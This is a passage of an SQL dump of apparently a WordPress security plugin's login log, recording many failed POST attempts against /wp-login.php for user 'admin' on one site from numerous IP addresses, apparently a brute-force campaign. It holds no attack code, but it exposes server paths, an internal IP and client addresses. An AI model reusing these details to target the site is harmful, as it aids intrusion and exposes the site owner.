s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747027852.216069;s:12:\"REQUEST_TIME\";i:1747027852;}}','209.172.2.50',0,'2025-05-12 11:00:53','1970-01-01 00:00:00'),(95618,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51444\";s:11:\"REMOTE_ADDR\";s:14:\"103.118.29.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747028178.7349;s:12:\"REQUEST_TIME\";i:1747028178;}}','103.118.29.120',0,'2025-05-12 11:06:20','1970-01-01 00:00:00'),(95619,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42964\";s:11:\"REMOTE_ADDR\";s:14:\"177.234.154.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747028517.730814;s:12:\"REQUEST_TIME\";i:1747028517;}}','177.234.154.90',0,'2025-05-12 11:11:59','1970-01-01 00:00:00'),(95620,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36318\";s:11:\"REMOTE_ADDR\";s:15:\"190.106.145.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747028851.0930929;s:12:\"REQUEST_TIME\";i:1747028851;}}','190.106.145.111',0,'2025-05-12 11:17:32','1970-01-01 00:00:00'),(95621,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40674\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.32.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747029185.310143;s:12:\"REQUEST_TIME\";i:1747029185;}}','63.250.32.87',0,'2025-05-12 11:23:07','1970-01-01 00:00:00'),(95622,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49986\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747029523.2835619;s:12:\"REQUEST_TIME\";i:1747029523;}}','15.204.43.173',0,'2025-05-12 11:28:45','1970-01-01 00:00:00'),(95623,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53310\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747029859.1682889;s:12:\"REQUEST_TIME\";i:1747029859;}}','66.29.141.104',0,'2025-05-12 11:34:20','1970-01-01 00:00:00'),(95624,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60332\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.153.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747030203.132695;s:12:\"REQUEST_TIME\";i:1747030203;}}','66.29.153.28',0,'2025-05-12 11:40:04','1970-01-01 00:00:00'),(95625,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59392\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.145.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747030535.7453549;s:12:\"REQUEST_TIME\";i:1747030535;}}','68.183.145.0',0,'2025-05-12 11:45:37','1970-01-01 00:00:00'),(95626,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36232\";s:11:\"REMOTE_ADDR\";s:12:\"81.88.53.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747030871.9922719;s:12:\"REQUEST_TIME\";i:1747030871;}}','81.88.53.143',0,'2025-05-12 11:51:13','1970-01-01 00:00:00'),(95627,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58136\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747031549.0497301;s:12:\"REQUEST_TIME\";i:1747031549;}}','162.0.209.190',0,'2025-05-12 12:02:30','1970-01-01 00:00:00'),(95628,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 